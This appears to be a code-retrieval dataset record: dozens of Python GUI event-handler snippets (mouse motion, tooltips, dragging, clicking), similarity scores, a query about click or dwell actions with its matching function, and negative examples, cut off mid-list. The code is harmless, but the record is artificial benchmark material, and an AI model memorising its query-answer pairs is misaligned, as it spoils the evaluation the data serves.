self.withdraw()\r\n self.visible = 1\r\n\r\n # Offset the ToolTip 10x10 pixes southwest of the pointer\r\n self.geometry('+%i+%i' % (event.x_root+20, event.y_root-10))\r\n try:\r\n # Try to call the message function. Will not change\r\n # the message if the message function is None or\r\n # the message function fails\r\n self.msgVar.set(self.msgFunc())\r\n except:\r\n pass\r\n self.after(int(self.delay * 1000), self.show)", "def move(self, event):\r\n self.lastMotion = time()\r\n # If the follow flag is not set, motion within the\r\n # widget will make the ToolTip disappear\r\n #\r\n if self.follow is False:\r\n self.withdraw()\r\n self.visible = 1\r\n\r\n # Offset the ToolTip 10x10 pixes southwest of the pointer\r\n self.geometry('+%i+%i' % (event.x_root+20, event.y_root-10))\r\n try:\r\n # Try to call the message function. Will not change\r\n # the message if the message function is None or\r\n # the message function fails\r\n self.msgVar.set(self.msgFunc())\r\n except:\r\n pass\r\n self.after(int(self.delay * 1000), self.show)", "def move(self, event):\n self.lastMotion = time()\n # If the follow flag is not set, motion within the\n # widget will make the ToolTip disappear\n #\n if self.follow is False:\n self.withdraw()\n self.visible = 1\n\n # Offset the ToolTip 10x10 pixes southwest of the pointer\n self.geometry('+%i+%i' % (event.x_root+20, event.y_root-10))\n try:\n # Try to call the message function. Will not change\n # the message if the message function is None or\n # the message function fails\n self.msgVar.set(self.msgFunc())\n except:\n pass\n self.after(int(self.delay * 1000), self.show)", "def mouseMoveEvent(self, event):\n if self._ignore_mouse_events:\n event.ignore()\n return\n\n event.accept()\n\n if self._selection_mode != SelectionMode.NONE:\n x = event.x()\n y = event.y()\n xdiff = float(x - self._selection_position_start[0])\n ydiff = float(y - self._selection_position_start[1])\n if abs(xdiff) < 0.0001:\n xdiff = 1\n if abs(ydiff) < 0.0001:\n ydiff = 1\n xoff = float(self._selection_position_start[0]) / xdiff + 0.5\n yoff = float(self._selection_position_start[1]) / ydiff + 0.5\n self._addUpdateSelectionBox(xdiff, ydiff, xoff, yoff)\n\n elif self._use_zinc_mouse_event_handling:\n scene_input = self._sceneviewer.createSceneviewerinput()\n scene_input.setPosition(event.x(), event.y())\n scene_input.setEventType(Sceneviewerinput.EVENT_TYPE_MOTION_NOTIFY)\n if event.type() == QtCore.QEvent.Leave:\n scene_input.setPosition(-1, -1)\n self._sceneviewer.processSceneviewerinput(scene_input)", "def mouse_position_event(self, x: int, y: int):\n pass", "def mousePressEvent(self, event):\n self.begin = event.pos()\n self.end = event.pos()\n self.update()", "def handle_mouse(self, x, y):\n pass", "def handle_mouse_press(self, event):", "def update(self):\n # Get where the mouse is\n pos = pygame.mouse.get_pos()\n # Set the left side of the player bar to the mouse position\n self.rect.x = pos[0]\n # Make sure we don't push the player paddle \n # off the right side of the screen\n if self.rect.x > self.screenwidth - self.width:\n self.rect.x = self.screenwidth - self.width", "def mouseMoveEvent(self, evnt):\n # if mouse button is down check if you want to move nodes\n if not evnt.buttons() == QtCore.Qt.LeftButton:\n return\n if self.mode != self.MODE_SELECT:\n return\n dx = evnt.scenePos().x() - self.pressX\n dy = evnt.scenePos().y() - self.pressY\n for i, node in enumerate(self.selectedNodes):\n x = self.ipos[i][0] + dx\n y = self.ipos[i][1] + dy\n x, y = self.nearestGrid(x, y) # snap to minor grids\n self.p.dat.flowsheet.nodes[node].x = x\n self.p.dat.flowsheet.nodes[node].y = y\n self.p.createScene()\n self.p.updateFSPos.emit() # update the flowsheet and node editor", "def process_IN_MOVE_SELF(self, event):", "def update(self):\n pos = pygame.mouse.get_pos()\n self.rect.midtop = pos\n if self.punching:\n self.rect.move_ip(5, 10)", "def mouseMoveEvent(self, event):\n if self.mousenode is not None:\n self.mousenode.setPos(event.scenePos())\n return QtGui.QGraphicsScene.mouseMoveEvent(self, event)", "def update(self):\n pos = pygame.mouse.get_pos()\n self.rect.midtop = pos\n if self.punching:\n self.rect.move_ip(5, 10) # move fist position in place", "def mouseMoveEvent(self, event: QMouseEvent):\n if self._moving:\n # If _moving is set from mousePressEvent , change geometry\n self.prepareGeometryChange()\n\n pos = event.pos().toPoint()\n\n if pos.x() >= self._origin.x():\n self._rect.setRight(pos.x())\n else:\n self._rect.setLeft(pos.x())\n\n if pos.y() >= self._origin.y():\n self._rect.setBottom(pos.y())\n else:\n self._rect.setTop(pos.y())\n self._rect = self._rect.normalized()\n self.update()\n return\n else:\n super().mouseMoveEvent(event)", "def mouseMoveEvent(self, event):\n if self.line:\n self.line.setLine(QLineF(self.line.line().p1(), event.scenePos()))\n\n QGraphicsScene.mouseMoveEvent(self, event)\n self.update()", "def update(self):\n\n\t\tself.x = games.mouse.x\n\t\tself.y = games.mouse.y\n\t\tself.check_collide()", "def onMove(self,event=None):\n if self.app.DEBUG:\n print 'Event: Parent: %s.onMove'%self.__class__\n if self.redraw:self.redraw()", "def update(self):\n self.x = games.mouse.x\n #self.y = games.mouse.y\n self.check_collide()", "def update(self):\r\n self.x = games.mouse.x\r\n self.y = games.mouse.y\r\n self.check_collide()", "def ev_MOUSEUP(self, event):", "def mouseDragged(self, point, delta):\n pass", "def update(self):\n self.x = games.mouse.x\n self.y = games.mouse.y\n self.check_collide()", "def handleMove(self):\n pass", "def handle_pygame_event(self, event):\n if event.type != MOUSEMOTION:\n # nothing to do\n return\n self.model.paddle.x = event.pos[0]-self.model.paddle.width/2.0", "def mouseMoveEvent(self, e):\n if e.pos().y() == self.offset:\n return\n adder = (self.offset - e.y())\n self.deltacount += adder\n #adder *= self.accelerator\n adder *= (abs(adder) * 0.01)\n #self._state[0] = max(self._min[0], min(self._max[0], self._state[0] + adder))\n QtGui.qApp.emit( QtCore.SIGNAL(\"deltaChanged\"), self, adder)\n #self._param.update()\n QtGui.QCursor.setPos(self.origo)", "def on_mouse_movement(self, event: wx.MouseEvent) -> None:\n if not event.Dragging():\n self._drag_start_pos = None\n return\n # self.CaptureMouse()\n if self._drag_start_pos is None:\n self._drag_start_pos = event.GetPosition()\n else:\n current_pos = event.GetPosition()\n change = self._drag_start_pos - current_pos\n self.SetPosition(self.GetPosition() - change)", "def on_mouse_movement(self, event: wx.MouseEvent) -> None:\n if not event.Dragging():\n self._drag_start_pos = None\n return\n # self.CaptureMouse()\n if self._drag_start_pos is None:\n self._drag_start_pos = event.GetPosition()\n else:\n current_pos = event.GetPosition()\n change = self._drag_start_pos - current_pos\n self.SetPosition(self.GetPosition() - change)", "def move_move(self, event):\n self.canvas.scan_dragto(event.x, event.y, gain=1)", "def onMove(self, event):\n\t\tif (event.xdata != None and event.ydata != None and event.xdata != self.xdata and event.ydata != self.ydata):\n\n\t\t\tself.xdata = event.xdata\n\t\t\tself.ydata = event.ydata\n\n\t\t\tfor loop in range(4):\n\t\t\t\tself.stokesFig.canvas.restore_region(self.background[loop])\n\t\t\t\tself.obsStokes[loop].set_ydata(self.stokes[loop][event.ydata, event.xdata, :])\n\t\t\t\tself.axStokes[loop].draw_artist(self.obsStokes[loop])\n\t\t\t\tself.axStokes[loop].draw_artist(self.axStokes[loop].get_yaxis())\n\t\t\t\tself.stokesFig.canvas.blit(self.axStokes[loop].bbox.expanded(1.4, 1.1))", "def moveEvent(self, *args, **kwargs):\n self.windowMoved.emit()", "def OnIdle(self, event):\r\n\r\n if self._moving: \r\n if _VERSION_STRING < \"2.9\":\r\n leftDown = wx.GetMouseState().LeftDown()\r\n else:\r\n leftDown = wx.GetMouseState().LeftIsDown()\r\n\r\n if not leftDown:\r\n self._moving = False\r\n self.OnMoveFinished()\r\n else: \r\n event.RequestMore()", "def move( self, event ):\n self.lastMotion = time()\n if self.follow == False: # If the follow flag is not set, motion within the widget will make the ToolTip dissapear\n self.withdraw()\n self.visible = 1\n\n root = self.parent\n root = self.parent\n\n # parent_name = self.winfo_parent()\n # root = self._nametowidget(parent_name)\n\n \n # pa = re.split(r'(\\D)', root.geometry())\n # pt = re.split(r'(\\D)', self.geometry())\n #pm = re.split(r'(\\D)', self.master.geometry())\n #print \"root: \", pa\n #print \"tool: \", self.geometry()\n #print \"pm: \", self.wdgt.geometry()\n #print \"mouse: \", event.x_root, event.y_root\n #print \"mouser: \", event.x, event.y\n \n xCan = event.x_root - self.parent.winfo_rootx()\n yCan = event.y_root - self.parent.winfo_rooty()\n #print \"mouser2: \", xCan, yCan\n \n \n \n #if pa[5] == '-':\n # limit_x = int(pa[0]) - int(pa[6]) \n # print \"minus\"\n #else:\n #limit_x = int(pa[0]) + int(pa[4]) \n #if root.state() == 'zoomed':\n # limit_x = int(pa[0])\n #print \"lim: \", limit_x\n \n self.geometry( '+%i+%i' % ( event.x_root+10, event.y_root+10 ) ) # Offset the ToolTip 10x10 pixes southwest of the pointer\n \n # if xCan > (limit_x-int(pt[0])):\n # #print \"xxx\"\n # self.geometry( '+%i+%i' % ( event.x_root-int(pt[0]), event.y_root+10 ) ) # Offset the ToolTip 10x10 pixes southwest of the pointer\n # else:\n # self.geometry( '+%i+%i' % ( event.x_root+10, event.y_root+10 ) ) # Offset the ToolTip 10x10 pixes southwest of the pointer\n # try:\n # self.msgVar.set( self.msgFunc() ) # Try to call the message function. Will not change the message if the message function is None or the message function fails\n # except:\n # pass\n self.after( int( self.delay * 1000 ), self.show )", "def mouseMoveEvent(self, mouseEvent):\n QGraphicsScene.mouseMoveEvent(self, mouseEvent)\n if not mouseEvent.isAccepted() and mouseEvent.buttons() == Qt.LeftButton:\n delta = mouseEvent.lastScreenPos() - mouseEvent.screenPos()\n self.translate(delta.x(), delta.y())", "def update(self):\n pygame.event.pump()\n self.pos_x -= 1.5", "def mouseDragged():\n if mousePressed:\n mousePressed()", "def mouse_motion_handler(self, event):\r\n\r\n self.reset_button.mouse_motion_handler(event.pos)\r\n\r\n if not self.is_game_over:\r\n tile = self.board.get_event_tile(event.pos)\r\n self.board.update_tile_hover(tile, self.is_left_mouse_down, self.is_right_mouse_down)\r\n self.update_reset_button()", "def onMouseMove(self,mouseEvent):\n\t\tself.canvas.drawEdgeTo(mouseEvent.x,mouseEvent.y)", "def grab(self, event):\n self.ypos = event.y\n self.xpos = event.x\n self.config(cursor='fleur')", "def emitMouseMoveEvent(self, location, currentKbKey, draggedItems, items):\n # emit the mouseMoveEvent signal\n self.mouseMove.emit(self, location, currentKbKey, draggedItems, items)", "def hoverMoveEvent(self, event):\n activeTool = self._activeTool()\n toolMethodName = str(activeTool) + \"HoverMove\"\n if hasattr(self, toolMethodName):\n getattr(self, toolMethodName)(event.pos())", "def callback_handle_left_mouse_motion(self, event):\n\n # TODO: update this for the case where there is no current shape id\n vector_object = self.get_vector_object(self.variables.current_shape_id)\n if self.variables.active_tool == TOOLS.PAN_TOOL:\n x_dist = event.x - self.variables.tmp_anchor_point[0]\n y_dist = event.y - self.variables.tmp_anchor_point[1]\n self.move(self.variables.image_id, x_dist, y_dist)\n self.variables.tmp_anchor_point = event.x, event.y\n elif self.variables.active_tool == TOOLS.TRANSLATE_SHAPE_TOOL:\n x_dist = event.x - self.variables.tmp_anchor_point[0]\n y_dist = event.y - self.variables.tmp_anchor_point[1]\n t_coords = self.get_shape_canvas_coords(self.variables.current_shape_id)\n new_coords = numpy.asarray(t_coords) + x_dist\n new_coords_y = numpy.asarray(t_coords) + y_dist\n new_coords[1::2] = new_coords_y[1::2]\n if vector_object.image_drag_limits:\n canvas_limits = self.image_coords_to_canvas_coords(vector_object.image_drag_limits)\n x_vertices = new_coords[0::2]\n y_vertices = new_coords[1::2]\n within_x_limits = True\n within_y_limits = True\n for x_vertex in x_vertices:\n if canvas_limits[2] < x_vertex or x_vertex < canvas_limits[0]:\n within_x_limits = False\n for y_vertex in y_vertices:\n if y_vertex < canvas_limits[1] or y_vertex > canvas_limits[3]:\n within_y_limits = False\n if not within_x_limits:\n new_coords[0::2] = t_coords[0::2]\n if not within_y_limits:\n new_coords[1::2] = t_coords[1::2]\n self.modify_existing_shape_using_canvas_coords(self.variables.current_shape_id,\n new_coords,\n update_pixel_coords=True)\n self.variables.tmp_anchor_point = event.x, event.y\n elif self.variables.active_tool == TOOLS.EDIT_SHAPE_COORDS_TOOL:\n previous_coords = self.get_shape_canvas_coords(self.variables.current_shape_id)\n coord_x_index = self.variables.tmp_closest_coord_index*2\n coord_y_index = coord_x_index + 1\n new_coords = list(previous_coords)\n new_coords[coord_x_index] = event.x\n new_coords[coord_y_index] = event.y\n if vector_object.image_drag_limits:\n drag_x_lim_1, drag_y_lim_1, drag_x_lim_2, drag_y_lim_2 = \\\n self.image_coords_to_canvas_coords(vector_object.image_drag_limits)\n if new_coords[coord_x_index] < drag_x_lim_1:\n new_coords[coord_x_index] = drag_x_lim_1\n if new_coords[coord_x_index] > drag_x_lim_2:\n new_coords[coord_x_index] = drag_x_lim_2\n if new_coords[coord_y_index] < drag_y_lim_1:\n new_coords[coord_y_index] = drag_y_lim_1\n if new_coords[coord_y_index] > drag_y_lim_2:\n new_coords[coord_y_index] = drag_y_lim_2\n\n self.modify_existing_shape_using_canvas_coords(self.variables.current_shape_id, tuple(new_coords))\n elif self.variables.active_tool == TOOLS.ZOOM_IN_TOOL:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.ZOOM_OUT_TOOL:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.SELECT_TOOL:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_RECT_BY_DRAGGING:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_ELLIPSE_BY_DRAGGING:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_LINE_BY_DRAGGING:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_ARROW_BY_DRAGGING:\n self.event_drag_line(event)\n elif self.variables.active_tool == TOOLS.DRAW_POINT_BY_CLICKING:\n self.modify_existing_shape_using_canvas_coords(self.variables.current_shape_id, (event.x, event.y))", "def __handleMouseEvents(self, event):\n if not self.enabled:\n return\n\n x, y = event.GetPosition()\n\n # First make sure we have started a box.\n if self.currentBox == None and not event.LeftDown():\n # No box started yet. Set cursor to the initial kind.\n self.__setCursor(wx.CURSOR_CROSS)\n return\n\n if event.LeftDown():\n if self.currentBox == None:\n # No RB Box, so start a new one.\n self.currentBox = (x, y, 0, 0)\n self.hasLetUp = 0\n elif self.__isSizingCursor():\n # Starting a sizing operation. Change the origin.\n position = getCursorPosition(x, y, self.currentBox, thickness=self.__THICKNESS)\n self.currentBox = self.__denormalizeBox(position, self.currentBox)\n\n elif event.Dragging() and event.LeftIsDown():\n # Use the cursor type to determine operation\n if self.__isMovingCursor():\n if self.currentlyMoving or pointInBox(x, y, self.currentBox):\n if not self.currentlyMoving:\n self.currentlyMoving = (x - self.currentBox[0], y - self.currentBox[1])\n self.__moveTo(x - self.currentlyMoving[0], y - self.currentlyMoving[1])\n elif self.__isSizingCursor():\n self.__resizeBox(x, y)\n\n elif event.LeftUp():\n self.hasLetUp = 1\n self.currentlyMoving = None\n self.__normalizeBox()\n\n elif event.Moving() and not event.Dragging():\n # Simple mouse movement event\n self.__mouseMoved(x,y)", "def on_mouse_motion(self, x, y, delta_x, delta_y):\n\n print(x)\n print(y)\n print(delta_x)\n print(delta_y)\n\n\n #self.manage_crosshair()\n \n \n\n #self.crosshair_sprite.center_x += delta_x\n #self.crosshair_sprite.center_y += delta_y\n\n\n self.crosshair_relative_xoffset += delta_x\n self.crosshair_relative_yoffset += delta_y", "def OnMoving(self, event):\r\n\r\n # notify the owner manager that the pane is moving\r\n self.OnMoveStart(event)", "def handle_events(self) -> None:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEMOTION:\n self.mouse_pos = event.pos\n elif event.type == MOUSEBUTTONDOWN:\n self.mouse_pos = event.pos\n self.mouse_clicked = True\n elif self._focused_button is not None and event.type == KEYDOWN:\n self._handle_key_press(event)", "def _onMotionNotify(self, widget, event):\n\t\tif self.fullscreenToggle:\n\t\t\tmove = [event.x - self.mouseStart[0], event.y - self.mouseStart[1]]\n\t\t\tnewPos = [self.imgPosStart[0] - move[0], self.imgPosStart[1] - move[1]]\n\t\t\tself.moveImage(newPos[0], newPos[1])", "def normal_mouse_move(self, event):\n plot = self.component\n if plot is not None:\n if isinstance(plot, BaseXYPlot):\n ndx = plot.map_index((event.x, event.y), index_only = True)\n x = plot.index.get_data()[ndx]\n y = plot.value.get_data()[ndx]\n print self.format % (x,y)\n else:\n print \"dataprinter: don't know how to handle plots of type\",\n print plot.__class__.__name__\n return", "def update(self):\n if self.is_moving_up:\n self.dirty = 1\n if self.is_moving_down:\n self.dirty = 1\n if self.is_moving_right:\n self.dirty = 1\n if self.is_moving_left:\n self.dirty = 1\n \n self.rect.x += self.moveX\n self.logic.wall_hit_logic(self.moveX, \"x\", self.room.wall_list)\n self.room_change.change_room()\n \n self.rect.y += self.moveY\n self.logic.wall_hit_logic(self.moveY, \"y\", self.room.wall_list)\n self.room_change.change_room()", "def handleMove(self, pos):\n try:\n pos = pos[0]\n except IndexError:\n return\n\n mappedPos = self.img.mapFromScene(pos)\n xmp = int(mappedPos.x())\n ymp = int(mappedPos.y())\n\n if xmp < 0 or \\\n xmp > self.dat3d.shape[1] - 1 or \\\n ymp < 0 or \\\n ymp > self.dat3d.shape[0] - 1:\n return # discard movement events originating outside the image\n\n # update crosshair\n # self.ch.setPos(xmp, ymp)\n self.ch.curPos = (xmp, ymp)\n self.ch.vline.setPos(xmp)\n self.ch.hline.setPos(ymp)\n\n # update IV plot\n xdata = self.elist\n\n if self.posMask[ymp, xmp]:\n ydata = self.dat3ds[ymp, xmp, :]\n else:\n ydata = smooth(self.dat3d[ymp, xmp, :])\n self.dat3ds[ymp, xmp, :] = ydata\n self.posMask[ymp, xmp] = 1\n pdi = pqg.PlotDataItem(xdata, ydata, pen='r')\n self.IVpltw.getPlotItem().clear()\n self.IVpltw.getPlotItem().addItem(pdi, clear=True)\n # self.IVpltw.show()", "def motion(self, event):\n dx = event.x - self.dragx\n dy = event.y - self.dragy\n\n self.dragx = event.x\n self.dragy = event.y\n\n self.canvas.move(self.tags, dx, dy)\n self.diag.update_arrows()", "def update(self):\r\n self.x = 60\r\n self.y = games.mouse.y\r\n self.check_collide()", "def handle_mousemotion(self, change):\r\n if widget.Widget.handle_mousemotion(self, change):\r\n app.App.handle_mousemotion(self, change)\r\n return True\r\n return False", "def mouseMoveEvent(self, e):\n if e.pos().y() == self._offset:\n return\n adder = (self._offset - e.y())\n self.deltacount += adder\n adder *= (abs(adder) * 0.01)\n f = self._max[0] - self._min[0]\n self._state[0] = min(self._max[0], max(self._min[0], self._state[0] + (adder * f / 1000.0)))\n self._param.update()\n QtGui.QCursor.setPos(self._origo)", "def OnMotion(self, event):\r\n\r\n pos = event.GetPosition()\r\n\r\n # check if the mouse is hovering above a button\r\n\r\n button = self.ButtonHitTest(pos.x, pos.y)\r\n wnd = self.TabHitTest(pos.x, pos.y)\r\n\r\n if wnd is not None:\r\n mouse_tab = self.GetIdxFromWindow(wnd)\r\n if not self._pages[mouse_tab].enabled:\r\n self._hover_button = None\r\n return\r\n\r\n if self._on_button:\r\n return\r\n \r\n if button:\r\n \r\n if self._hover_button and button != self._hover_button:\r\n self._hover_button.cur_state = AUI_BUTTON_STATE_NORMAL\r\n self._hover_button = None\r\n self.Refresh()\r\n self.Update()\r\n \r\n if button.cur_state != AUI_BUTTON_STATE_HOVER:\r\n button.cur_state = AUI_BUTTON_STATE_HOVER\r\n self.Refresh()\r\n self.Update()\r\n self._hover_button = button\r\n return\r\n \r\n else:\r\n \r\n if self._hover_button:\r\n self._hover_button.cur_state = AUI_BUTTON_STATE_NORMAL\r\n self._hover_button = None\r\n self.Refresh()\r\n self.Update()\r\n\r\n if not event.LeftIsDown() or self._click_pt == wx.Point(-1, -1):\r\n return\r\n\r\n if not self.HasCapture():\r\n return\r\n \r\n wnd = self.TabHitTest(pos.x, pos.y)\r\n\r\n if not self._is_dragging:\r\n\r\n drag_x_threshold = wx.SystemSettings.GetMetric(wx.SYS_DRAG_X)\r\n drag_y_threshold = wx.SystemSettings.GetMetric(wx.SYS_DRAG_Y)\r\n\r\n if abs(pos.x - self._click_pt.x) > drag_x_threshold or \\\r\n abs(pos.y - self._click_pt.y) > drag_y_threshold:\r\n\r\n self._is_dragging = True\r\n\r\n if self._drag_image:\r\n self._drag_image.EndDrag()\r\n del self._drag_image\r\n self._drag_image = None\r\n\r\n if self._agwFlags & AUI_NB_DRAW_DND_TAB:\r\n # Create the custom draw image from the icons and the text of the item\r\n mouse_tab = self.GetIdxFromWindow(wnd)\r\n page = self._pages[mouse_tab]\r\n tab_button = self._tab_close_buttons[mouse_tab]\r\n self._drag_image = TabDragImage(self, page, tab_button.cur_state, self._art)\r\n\r\n if self._agwFlags & AUI_NB_TAB_FLOAT:\r\n self._drag_image.BeginDrag(wx.Point(0,0), self, fullScreen=True)\r\n else:\r\n self._drag_image.BeginDragBounded(wx.Point(0,0), self, self.GetParent())\r\n\r\n # Capture the mouse cursor position offset relative to\r\n # The tab image location\r\n self._drag_img_offset = (pos[0] - page.rect.x,\r\n pos[1] - page.rect.y)\r\n\r\n self._drag_image.Show()\r\n\r\n if not wnd:\r\n evt2 = AuiNotebookEvent(wxEVT_COMMAND_AUINOTEBOOK_BEGIN_DRAG, self.GetId())\r\n evt2.SetSelection(self.GetIdxFromWindow(self._click_tab))\r\n evt2.SetOldSelection(evt2.GetSelection())\r\n evt2.SetEventObject(self)\r\n self.GetEventHandler().ProcessEvent(evt2)\r\n if evt2.GetDispatched():\r\n return\r\n \r\n evt3 = AuiNotebookEvent(wxEVT_COMMAND_AUINOTEBOOK_DRAG_MOTION, self.GetId())\r\n evt3.SetSelection(self.GetIdxFromWindow(self._click_tab))\r\n evt3.SetOldSelection(evt3.GetSelection())\r\n evt3.SetEventObject(self)\r\n self.GetEventHandler().ProcessEvent(evt3)\r\n\r\n if self._drag_image:\r\n # Apply the drag images offset\r\n pos -= self._drag_img_offset\r\n self._drag_image.Move(pos)", "def updateNodeMove(self, mouseA, mouseB):\n for node in self.nodeMgr.selectedNodes:\n if node is not self.draggedNode and node in self.tempNodePositions.keys():\n editVec = Vec3(self.tempNodePositions[node] - mouseA)\n newPos = mouseB + editVec\n node.frame.setPos(render2d, newPos)\n self.nodeMgr.updateConnections()", "def ev_mousemotion(self, event: tcod.event.MouseMotion) -> T | None:", "def _onmove(self, event):\n\n # self._prev are deprecated but we still need to maintain it\n self._prev = self._get_data(event)\n\n v = event.xdata if self.direction == 'horizontal' else event.ydata\n if self.direction == 'horizontal':\n vpress = self._eventpress.xdata\n else:\n vpress = self._eventpress.ydata\n\n # move existing span\n # When \"dragging from anywhere\", `self._active_handle` is set to 'C'\n # (match notation used in the RectangleSelector)\n if self._active_handle == 'C' and self._extents_on_press is not None:\n vmin, vmax = self._extents_on_press\n dv = v - vpress\n vmin += dv\n vmax += dv\n\n # resize an existing shape\n elif self._active_handle and self._active_handle != 'C':\n vmin, vmax = self._extents_on_press\n if self._active_handle == 'min':\n vmin = v\n else:\n vmax = v\n # new shape\n else:\n # Don't create a new span if there is already one when\n # ignore_event_outside=True\n if self.ignore_event_outside and self._selection_completed:\n return\n vmin, vmax = vpress, v\n if vmin > vmax:\n vmin, vmax = vmax, vmin\n\n self.extents = vmin, vmax\n\n if self.onmove_callback is not None:\n self.onmove_callback(vmin, vmax)\n\n return False", "def move_start(event):\n nonlocal x, y\n x = event.x \n y = event.y\n window['cursor'] = utils.CURSORS['move_item']", "def update(self):\n self.rect.x += self.change_x\n self.rect.y += self.change_y" ]
[ "0.7725639", "0.75353", "0.7477627", "0.7465811", "0.7323981", "0.72936875", "0.7253632", "0.725092", "0.71977973", "0.71450245", "0.71029884", "0.71029884", "0.70396215", "0.7001727", "0.6984642", "0.6945438", "0.69439787", "0.6930062", "0.69186425", "0.6899531", "0.6893881", "0.6875705", "0.68618554", "0.68148744", "0.67940384", "0.6782933", "0.67663574", "0.6745291", "0.67323244", "0.6731975", "0.6713997", "0.6712254", "0.67094046", "0.67080474", "0.6691214", "0.6677952", "0.66754645", "0.6672091", "0.6668611", "0.66530585", "0.6651209", "0.6651209", "0.664306", "0.6638818", "0.6638016", "0.66333765", "0.6632337", "0.6628603", "0.66184014", "0.6614607", "0.66061693", "0.65945387", "0.65916026", "0.6591074", "0.6587661", "0.65816706", "0.65812093", "0.6575241", "0.65652364", "0.6562125", "0.6558429", "0.65558404", "0.65551883", "0.6554132", "0.6553645", "0.65525275", "0.6546365", "0.6546365", "0.65385735", "0.65174407", "0.6511257", "0.6486144", "0.6483288", "0.6478382", "0.6473332", "0.6458773", "0.6430925", "0.6408773", "0.64071774", "0.6405528", "0.6393178", "0.638827", "0.638589", "0.63844633", "0.63781476", "0.63778275", "0.63773596", "0.63748443", "0.63594365", "0.63583064", "0.635603", "0.63441914", "0.6324809", "0.6322336", "0.6303743", "0.63012123", "0.62980294", "0.62953234", "0.62913513", "0.62885433" ]
0.6727378
30
Responds to click or dwell actions
def click(self, pos): # Confirm the setup if (self.setup_type != None): self.start_setup(None)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def click(self):\r\n pass", "def on_dclick ( self, object ):\n pass", "def on_click(self) -> None:\n pass", "def click(self):\n self.dispatch['elementClick'] = self.clickJsFnc", "def on_click ( self, object ):\n pass", "def interact(self):\r\n pass", "def _do_action(self):\n pass", "def _do_action(self):\n pass", "def act(self):\n pass", "def on_right_click(self, client, game) -> None:\n pass", "def on_click(self, event):\n if self.click_job is not None:\n self.after_cancel(self.click_job)\n item = self.identify(\"item\", event.x, event.y)\n if item:\n self.click_job = self.after(200, self.clicked, item)\n return \"break\"", "def _press(self, event):", "def mouse_click(self,x,y,button,double_click):\n raise NotImplementedError(\"ERROR: Unimplemented function.\")", "def clickedAction(self, events):\n print(\"The {} button was clicked!\".format(self.imgname))", "def clickOverride():\n\n pass", "def take_action(self, *args, **kwargs):\r\n pass", "def click(self, agent):\n self.grab(agent)\n #eventlet.sleep(5)\n self.degrab(agent)", "def _click(self):\n self._touch = self.view.touch", "def on_click(self, x, y):\n self.menu_pointer.on_click(x, y)", "def action(self):\n pass", "def action(self):\n pass", "def act(self):\n raise NotImplementedError", "def onAction(*args):", "def onAction(*args):", "def onAction(*args):", "def onAction(*args):", "def onClick(*args):", "def onClick(*args):", "def onClick(*args):", "def onClick(*args):", "def act(self) -> None:\n pass", "def trigger(self, type, event):", "def on_click(self, x, y):\n mul_x, mul_y = self.multiplier\n off_x, off_y = self.offset\n x -= off_x\n x /= mul_x\n y -= off_y\n y /= mul_y\n for button in self.button_dict.values():\n button.check_click(x, y)", "def arduPusherClick(self, dummy = 0):\r\n self.ardu.write(chr(self.CLICK))", "def __on_click(self):\n if self.enable:\n self.__function_to_activate()", "def DoAction(self,event):\r\n selections = self.list.GetSelections()\r\n if not selections: return bell()\r\n itemDex = selections[0]\r\n item = self.items[itemDex]\r\n self.data.action(item)", "def ev_mousebuttondown(self, event: MouseButtonDown) -> None:", "def click_on_hero():\n mouseclick(coords_hero_button[0], coords_hero_button[1])", "def atomacclick(objecttoclick):\n try:\n objecttoclick.Press()\n #print \"clicked on : %s\" %objecttoclick\n except Exception as er:\n print \"Not able to click on: %s\" %objecttoclick", "def ev_MOUSEDOWN(self, event):", "def handle_event(self, event):", "def react_to_event(self):\n raise NotImplementedError()", "def HandButton(self, event):\n pass", "def on_click(self) -> None:\n self.cycle()", "def responder():\n pass", "def mainWebActions(self, **kwargs):\n # If the dictionary item value is the required opens the webpage\n if kwargs['button']=='docs':\n # Only 1 click at every 5 seconds\n self.docs_Button.setDown(True)\n QTimer.singleShot(5000, lambda: self.docs_Button.setDown(False))\n webbrowser.open('https://italorenan.gitbook.io/roc/')", "def tap():\n return \"I have clicked on the elements\"", "def Click(self):\n if self.function == None:\n return\n \n self.function()", "def handle_mouse_press(self, event):", "def ev_mousebuttondown(self, event: tcod.event.MouseButtonDown) -> T | None:", "def events(self):", "def __on_click(self, evt):\n if evt.button() == Qt.LeftButton:\n return self._on_left_click(evt)\n if evt.button() == Qt.RightButton:\n return self._on_right_click(evt)", "def click(self, mouse_pos):\n for button in self.enabled_buttons(): # type: Button\n if button.is_position_on_button(mouse_pos):\n self.sound.play_sound(self.click_sound)\n button.click()", "def select_action(self):\n pass", "def click(cls, user, link):\r\n pass", "def handle_event(self, event):\n if not self.can_afford:\n self.cant_afford_dialogue.handle_event(event)\n else:\n self.how_many_selector.handle_event(event)", "def choose_action(self):\r\n pass", "def _launch_click_through_dialog(self):\n text = \"The port test did not complete successfully. If you are certain that you really did forward the port and would like to continue anyway, you can do so.\\\n Otherwise, you may want to try again.\"\n self.controller.show_msgbox(text, title=\"Do You Really Want to Do That?\", cb=self._click_through_dialog_cb, buttons=(gtk.STOCK_CANCEL, 0, gtk.STOCK_OK, 1), width=300)", "def actions():\n pass", "def handle_event(self, event, window):\n pass", "def _do_action(self, handler: 'Handler') -> CanDo:\n pass", "def _handle_button_msg(self, _, content):\n self.debug = \"debug: \" + str(content)\n try:\n if content.get('event', '') == 'open':\n self.debug = \"debug-ope: \" + str(content)\n self.session_open(content.get('filename'))\n elif content.get('event', '') == 'close':\n self.debug = \"debug-clo: \" + str(content)\n self.session_close()\n else:\n raise Exception(\"command not implemented for \", str(content))\n except Exception as err:\n self.set_status(\"error\", str(err))", "def action_done(self):", "def double_click(self, *args):\n return _ida_hexrays.Hexrays_Hooks_double_click(self, *args)", "def on_event(self, event):", "def click(self) -> None:\n logging.info(f\"click element. {self.desc}\")\n js = f\"\"\"var elm = document.querySelectorAll(\"{self.css}\")[{self.index}];\n elm.style.border=\"2px solid red\";\n elm.click();\"\"\"\n self._execute_javascript(js)", "def _click(self):\n if hasattr(self.canvas[\"items\"][self.index], 